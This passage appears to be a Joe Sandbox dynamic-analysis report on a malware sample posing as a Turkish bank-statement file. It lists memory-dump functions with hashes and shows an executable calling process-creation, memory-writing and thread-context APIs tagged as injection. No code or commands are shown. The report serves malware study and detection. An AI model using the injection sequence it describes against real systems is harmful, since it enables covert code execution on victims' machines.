Opcode Fuzzy Hash: 5a1dd66a1429303a2ab69203c70253408f8d5ee95943c9fb1432ede749628ab6
Instruction Fuzzy Hash: BC216472104204EFCB15CF64C9C1B2ABBA5FB84314F20C5ADEA890B652C77AD446CB62

Function 012D5649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f245fe2cca97353fce8fb712a8a42165df43667ab87b83e276a727027b79b4
Instruction ID: d405697745dd264c74f77ce9b647be727da8113e001afe01cc30e25e73cb1aa4
Opcode Fuzzy Hash: 05f245fe2cca97353fce8fb712a8a42165df43667ab87b83e276a727027b79b4
Instruction Fuzzy Hash: 2A21F33170524AEFDB06AF69E4586AF3FB2EB49210F104069F9458B355CBB4CD56CBD0

Function 012D4285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23ae1380980be3e66df54c9b67baf94ee813e75d76b95687084cf1e3020829a5
Instruction ID: adc9e572c19fa9a5f0b2a12086e7f6a08fb7b2009a15326595b9f5005f8c1718
Opcode Fuzzy Hash: 23ae1380980be3e66df54c9b67baf94ee813e75d76b95687084cf1e3020829a5
Instruction Fuzzy Hash: B3319474E11348DFCB44DFA8E58489DBBB2FF59301B205469E809AB324D731AD55CF40

Function 012D9761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a14600e4959adf1d3d3961c97944b276c85f81e52c7bc5d8386b9bae2e9614f
Instruction ID: 0c4dde7882acfaaabac326627efb2aad6525d38dce843cfcb2bc6be05d8c58a0
Opcode Fuzzy Hash: 0a14600e4959adf1d3d3961c97944b276c85f81e52c7bc5d8386b9bae2e9614f
Instruction Fuzzy Hash: EA217A70E04249EFEF09CFA5E550AEEBFB6AF49205F148059E505E7390DB30D981CB20

Function 012D62F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d48a592d7ed1872809512b2a3e488a925464ee03b5478b4d2a6741bdb296bbb8
Instruction ID: d1e79c816585d13918eaaee711edec6858db772ca6adc93a25cfbff05509c61b
Opcode Fuzzy Hash: d48a592d7ed1872809512b2a3e488a925464ee03b5478b4d2a6741bdb296bbb8
Instruction Fuzzy Hash: A41106317496129FD7168B2DD46852E7BA2BFC5B5130844A9E506CB7A0CF31DC028790

Function 012DF313 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11db9088a91986fa581608da67fa583b0bf6c65654237f369a3a7a05834b49c9
Instruction ID: 85eacc1648de477ee221859d605bef3c1efe53124a6ae143c7ef8e183d802c39
Opcode Fuzzy Hash: 11db9088a91986fa581608da67fa583b0bf6c65654237f369a3a7a05834b49c9
Instruction Fuzzy Hash: 0721277190024ADFDB45EFA9D54479EBFF2FB85300F0086AEC184AB259EB745A46CB81

Function 012D27F0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2a781dbffcd3b28ae37884902e9c6c2c0733c867be057a0dc8ff636154e30c9
Instruction ID: 5a4affae2319512911ba69750d4bc5daba37624557b44e2437dcfe940fab0d78
Opcode Fuzzy Hash: f2a781dbffcd3b28ae37884902e9c6c2c0733c867be057a0dc8ff636154e30c9
Instruction Fuzzy Hash: 2121E074D1524ACFCB01EFA9D8555EEBFF0BF0A300F10466AD805F6210EB301A99CBA1

Function 012DF320 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f1376341988cdfea1e685d6abbd6b478d020b8e31e55f8188d50d771584884a
Instruction ID: c09f1fcc769c1ace25d4ef86c65fcf5830fa0c2fb9d9604df72f381366d1d094
Opcode Fuzzy Hash: 8f1376341988cdfea1e685d6abbd6b478d020b8e31e55f8188d50d771584884a
Instruction Fuzzy Hash: C2111771D0020ADFDB44EFA9D54079EBFF2FB84304F1096A9C158AB358EB745A458B80

Function 010FD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793203177.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10fd000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 75e7d621731bf210361f2f33acef458b8d057c2ab8bcc4cab07f8a758f3bb197
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 3211DD76504284DFCB12CF54C9C4B15BFA2FB84314F24C6ADE9894B652C33AD44ACF62

Function 012D5E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4082cc864d42b19719df94b2e4744708d1fc12478fbc435f9e0294ef6e905442
Instruction ID: b65415984936965708ecb9c792f42988b1f108ecb02c95579e283761d88d52cd
Opcode Fuzzy Hash: 4082cc864d42b19719df94b2e4744708d1fc12478fbc435f9e0294ef6e905442
Instruction Fuzzy Hash: 98012832700215BFCB029E55D810AEF7FB6EBC9250F048057F905CB784CAB18C16DB90

Function 012DABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddb550b43957d35c386d569b549f0a307b49c95f29714ea451237654a46c4dc0
Instruction ID: 51ffc6ea256a1ccf2d6e62c25458ab1b79fdfeb733ff5ddbbbe2d9262c45ed89
Opcode Fuzzy Hash: ddb550b43957d35c386d569b549f0a307b49c95f29714ea451237654a46c4dc0
Instruction Fuzzy Hash: E6F02B313106125B97266B2ED454E2EBBDEEFC8E65309447AEB05C7361EE61CC03C380

Function 012D9D59 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2432f18d9a482aa54c52e256065e66bd9d8165e3f8b1e8a175ecd07d851bc2c6
Instruction ID: b696f3e1265ddcd33f610d75a5b1e696f2e2c31b83a7809df4a1eb0ee58bcb10
Opcode Fuzzy Hash: 2432f18d9a482aa54c52e256065e66bd9d8165e3f8b1e8a175ecd07d851bc2c6
Instruction Fuzzy Hash: 23F044353001156FEB196AA9985097EBF9BEBC8260B148429BA0AC7350DE62CC5193A1

Function 012DE8E8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12acdaa07b7f7cffd41d1e1061889d5d641f77e916765b79e9d427948f21981c
Instruction ID: 4d2396ccc8b23da02448cd998a2b6983e8d726b34d6b21065689072d7686df6e
Opcode Fuzzy Hash: 12acdaa07b7f7cffd41d1e1061889d5d641f77e916765b79e9d427948f21981c
Instruction Fuzzy Hash: D9115379D0534AEFCF41DFA4D845AAEBBB1FB89300F40406AD910A3354E7345A59DF90

Function 012D9C23 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8db0636d46f03c71c6a33fc4bbdc4f406910139770c469b205591328f19b1325
Instruction ID: 97fd8ea73c511971099a24ff8c6fe17a39c85fa721c228848853fe46c1156ff1
Opcode Fuzzy Hash: 8db0636d46f03c71c6a33fc4bbdc4f406910139770c469b205591328f19b1325
Instruction Fuzzy Hash: 4DF0B4319142949FDF029F79D8486EEBFB1EF8A330F0485A6E558C7261D3314956CB91

Function 012D28A3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7663084d9831b28a95c20e956ede7db0880d428f6ab4d2ac9f5f7e8893de580b
Instruction ID: 7d6e5f00296e546c9e96dca4e25bc68065c2ca1567ae8b93b3c1831f46b1f99f
Opcode Fuzzy Hash: 7663084d9831b28a95c20e956ede7db0880d428f6ab4d2ac9f5f7e8893de580b
Instruction Fuzzy Hash: C0E02636D653A78ACB02E7F0BC140EEBB34ADC6121B4C459BE46137091EB30261AC7A1

Function 012D6739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d4964750070f592d29ab4254a9a9c16c97e0162b647f9d793f8b27fad56766e
Instruction ID: c8d742bc3b343dd01e0f410e3f7b587d426b540874e6035002c9a5dde58aa6c9
Opcode Fuzzy Hash: 2d4964750070f592d29ab4254a9a9c16c97e0162b647f9d793f8b27fad56766e
Instruction Fuzzy Hash: 0DE08C31008386CFC347AF31E8080457F3AEE82200B8459D9D0058F29ACFB85849CBA0

Function 012D28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ddff1cf7deec8df4b9a0e467b0d05c78638715c6fa43c2773db0418aa88514e
Instruction ID: 73aaf64c7bb5018b7e65ebf16bc7ffe48f22b4e9635f271f6c0d446ca8962ddd
Opcode Fuzzy Hash: 6ddff1cf7deec8df4b9a0e467b0d05c78638715c6fa43c2773db0418aa88514e
Instruction Fuzzy Hash: 57D02B31D2022B53CB00E7A1FC004DFF738EEC1220B404222E91033000FB302658C6F0

Function 012DD6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fc4937ce1743717bc04156907ef0034a2b5084d098a760f719e66defbf23a38
Instruction ID: 8fae06ded560d260aece09c429a72a42dd8517a001bee6616889d53eb80dcc75
Opcode Fuzzy Hash: 1fc4937ce1743717bc04156907ef0034a2b5084d098a760f719e66defbf23a38
Instruction Fuzzy Hash: 1FD0E234E4000DCBCB20DFA8E5844DCBBB1EB88321B10542AD92AA3642C6301821CF40

Function 012DAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5a610e14fc6734285f958505542a1cab6c35f5c13867d77ac3b596f739766e3
Instruction ID: a8ac2b7c1e77c533e4301dd3cddc0e380beef1fd85e42f7511f3c5790cf2cf28
Opcode Fuzzy Hash: d5a610e14fc6734285f958505542a1cab6c35f5c13867d77ac3b596f739766e3
Instruction Fuzzy Hash: 26D0673AB40108AFCB049F98E8409DDF7B6FB98221B048527E915A3260C6319925DB50

Function 012D6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b54c45264f17d0cdfd70ccddd60673ed6f16871d027656b0cff5c7f1e47897c0
Instruction ID: 947378d1953a29ff32730da046ad0cac4db86f95bfe1666f9b09e4e303e61616
Opcode Fuzzy Hash: b54c45264f17d0cdfd70ccddd60673ed6f16871d027656b0cff5c7f1e47897c0
Instruction Fuzzy Hash: 33C0123144430A8AD549FB76EC485553B7AA6C0304B80AA5C91050A75DDFF899454690

Analysis Process: EfgRyiVrT.exePID: 6272, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	205
Total number of Limit Nodes:	17

Executed Functions

Function 0175D4E8 Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0175D576
GetCurrentThread.KERNEL32 ref: 0175D5B3
GetCurrentProcess.KERNEL32 ref: 0175D5F0
GetCurrentThreadId.KERNEL32 ref: 0175D649

Memory Dump Source

Source File: 0000000A.00000002.2426604995.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1750000_EfgRyiVrT.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 466a51f755f4c4f5b8cd1e5db6cfd5d6d62c2945c7cc7eca93ba4339e620b326
Instruction ID: e4f760c9899c292b34818bc3a9240a75172fcba050b0aa70b3faa891ea6eee5c
Opcode Fuzzy Hash: 466a51f755f4c4f5b8cd1e5db6cfd5d6d62c2945c7cc7eca93ba4339e620b326
Instruction Fuzzy Hash: 9B5165B09003498FDB54DFA9D548B9EFBF1FF88314F20846DD509A72A0D7749984CB65

Function 0175D4F8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0175D576
GetCurrentThread.KERNEL32 ref: 0175D5B3
GetCurrentProcess.KERNEL32 ref: 0175D5F0
GetCurrentThreadId.KERNEL32 ref: 0175D649

Memory Dump Source

Source File: 0000000A.00000002.2426604995.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1750000_EfgRyiVrT.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: eaf61fd44dd2b6e903168016b00d5dba05f2e3b8e022aa0b641e52c0da82d32d
Instruction ID: 9b7a8e2b4fd861dc41968b155974cd6bd585f64b0d1294d0532bd9570f76039d
Opcode Fuzzy Hash: eaf61fd44dd2b6e903168016b00d5dba05f2e3b8e022aa0b641e52c0da82d32d
Instruction Fuzzy Hash: 4D5144B09003098FDB54DFA9D548BAEFBF1EF88318F208069E509A7360DBB45984CB65

Function 075D568C Relevance: 1.8, APIs: 1, Instructions: 254
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 075D58CE

Memory Dump Source

Source File: 0000000A.00000002.2435654183.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75d0000_EfgRyiVrT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0963b4b59c28de27e5cc4632d8b219ea5b289b7583794b3cdd0a3af3f06e6dd8
Instruction ID: dbd0f11c214495f64738403a325b24529c2e6998a8fa60145b9847a2c0c25751
Opcode Fuzzy Hash: 0963b4b59c28de27e5cc4632d8b219ea5b289b7583794b3cdd0a3af3f06e6dd8
Instruction Fuzzy Hash: 33A15EB1D0031ADFEB24DF68C8417EDBBB2BF44310F14856AD818A7240EB749A95CF91

Function 075D5698 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 075D58CE

Memory Dump Source

Source File: 0000000A.00000002.2435654183.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75d0000_EfgRyiVrT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b0262e0ddf302fbfb21ddd11c29e3dd182e2f2e5a95d97a5259a5e8fcf54cd4b
Instruction ID: 242ef247ed9ddb62fe88c8d81ebab5b0ee8d08d5163ca25216e21a316af6ec1e
Opcode Fuzzy Hash: b0262e0ddf302fbfb21ddd11c29e3dd182e2f2e5a95d97a5259a5e8fcf54cd4b
Instruction Fuzzy Hash: 4E914CB1D0035ADFEB24DF68C941BEDBBB2BF44310F14856AD818A7240EB749A95CF91

Function 0175AE59 Relevance: 1.7, APIs: 1, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0175B0BE

Memory Dump Source

Source File: 0000000A.00000002.2426604995.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1750000_EfgRyiVrT.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5f3564a5c477b079525650a7180d0201f7625e20f4a9e8691030d12e8bd57536
Instruction ID: 6f48efa5f7a152df2f43578c6885c85af8400a3550f26c037e078c1caff73187
Opcode Fuzzy Hash: 5f3564a5c477b079525650a7180d0201f7625e20f4a9e8691030d12e8bd57536
Instruction Fuzzy Hash: B7916870A00B458FE765DF29D44479ABBF1FF88300F048A6ED58ADBA91D7B5E805CB90

Function 074C6818 Relevance: 1.7, APIs: 1, Instructions: 193
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 074C67E4

Memory Dump Source

Source File: 0000000A.00000002.2435239802.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_74c0000_EfgRyiVrT.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: e66b7d9fc3a08dd1a582ce91b06bda04a724df0a4ea6f126eb308bfe6016bd00
Instruction ID: 76c45a0b71b41ff1529b30635f87b06d0ee64b2e2bcceb61effc4e8d8366edd1
Opcode Fuzzy Hash: e66b7d9fc3a08dd1a582ce91b06bda04a724df0a4ea6f126eb308bfe6016bd00
Instruction Fuzzy Hash: 1A618EB57002118FCB54EB69C858A9EBBE6AFC9610B15846EE906CB361DF71DC01CB91

Function 0175590D Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 017559C9

Memory Dump Source

Source File: 0000000A.00000002.2426604995.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1750000_EfgRyiVrT.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 42e5f4c93b36c0fac877c58da510ffb5f9896b186e7595ff310a19083d8ad2be
Instruction ID: a5e4f451d532ba40c136bf38264b1b241977c8cf7ccd71d4ac1a0ce93fdde66e
Opcode Fuzzy Hash: 42e5f4c93b36c0fac877c58da510ffb5f9896b186e7595ff310a19083d8ad2be
Instruction Fuzzy Hash: 1841BF71C00719CFDB24CFA9C984B9DFBB1BF89304F20816AD909AB251DBB56946CF90

Function 017544E0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 017559C9

Memory Dump Source

Source File: 0000000A.00000002.2426604995.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1750000_EfgRyiVrT.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 64862811053a9ccdbc9eb8be7d1c75dd4b90c7ec0ecb70715c644656ec1ec79d
Instruction ID: 47ce524ca0d3414557960b83de51afa098db95a2f1650c3d7d6f2ce3cd38250f
Opcode Fuzzy Hash: 64862811053a9ccdbc9eb8be7d1c75dd4b90c7ec0ecb70715c644656ec1ec79d
Instruction Fuzzy Hash: A541DDB0C0071DCBDB24CFA9C984B8EFBB5BF89304F20816AD508AB251DBB56945CF90

Function 075D4BD0 Relevance: 1.6, APIs: 1, Instructions: 74
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 075D4C68

Memory Dump Source

Source File: 0000000A.00000002.2435654183.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75d0000_EfgRyiVrT.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2ea2e61a6f075417222ba571b11f657943266dbd637c1901ac51486bcb509b86
Instruction ID: c232c38a20c5097345f5a6abf57a5ab2b6dc2042c40869df4097e765fea68473
Opcode Fuzzy Hash: 2ea2e61a6f075417222ba571b11f657943266dbd637c1901ac51486bcb509b86
Instruction Fuzzy Hash: BB2168B29003499FDF10CFA9C981BDEBBF5FF48320F10842AE918A7240C7799954CBA0

Function 075D4BD8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 075D4C68

Memory Dump Source

Source File: 0000000A.00000002.2435654183.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75d0000_EfgRyiVrT.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fa235cf401f729389d04adbb1ada090af2fc257ab348bd21e4e5ac9ffd058e29
Instruction ID: d3140b0c2bcc2ab05150c5d3a100c54b0abadd5de563eaaf5a3f6faf0f1ce5fe
Opcode Fuzzy Hash: fa235cf401f729389d04adbb1ada090af2fc257ab348bd21e4e5ac9ffd058e29
Instruction Fuzzy Hash: CD2126B19003599FDB10CFA9C985BDEBBF5FF48310F10842AE918A7250D7789950CBA4

Function 075D50C0 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075D5148

Memory Dump Source

Source File: 0000000A.00000002.2435654183.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75d0000_EfgRyiVrT.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 1f286eb86f81ef49c32a2f7f12586059a977d6749812dc3c6a5ccc81c4ad0e4b
Instruction ID: f685d9fb35dbace0b9b349635dea97d9bc631b9ec31aacd38ef3e0bd2fcf52c2
Opcode Fuzzy Hash: 1f286eb86f81ef49c32a2f7f12586059a977d6749812dc3c6a5ccc81c4ad0e4b
Instruction Fuzzy Hash: 7E2139B180034A9FDB14CFAAC981BDEFBF5FF48320F508429E518A7240D7799950CBA1

Function 075D4A3E Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075D4ABE

Memory Dump Source

Source File: 0000000A.00000002.2435654183.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75d0000_EfgRyiVrT.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 29cff2aaf9a3604add682f70b352490c95972789b3fee0d6f8e36d3fcf0e2a47
Instruction ID: d7548ea0aad1f2c07fb518aeee3f7b395816f5392fb0c7746aed5351c3a10fb2
Opcode Fuzzy Hash: 29cff2aaf9a3604add682f70b352490c95972789b3fee0d6f8e36d3fcf0e2a47
Instruction Fuzzy Hash: 732138B190030A9FDB10CFAAC4857EEBBF5FF88324F14842AD519A7240DB789944CFA5

Function 075D4A40 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075D4ABE

Memory Dump Source

Source File: 0000000A.00000002.2435654183.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75d0000_EfgRyiVrT.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 464cd731624e47648d10feb6082c775697c3a41a09fd21d4562608dbdc40f36c
Instruction ID: 58fca42e5db86584b732cd50814340316564bd26f53ffd3264a4bded84a43de5
Opcode Fuzzy Hash: 464cd731624e47648d10feb6082c775697c3a41a09fd21d4562608dbdc40f36c
Instruction Fuzzy Hash: FC2138B190030A8FDB10CFAAC4857EEBBF5FF88324F14842AD519A7240DB789944CFA5

Function 075D50C8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075D5148

Memory Dump Source

Source File: 0000000A.00000002.2435654183.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75d0000_EfgRyiVrT.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 877bfd31489051f007c5c3e6c3e5d1a7853710b37603e5e7b2a6d0313e3ca6ef
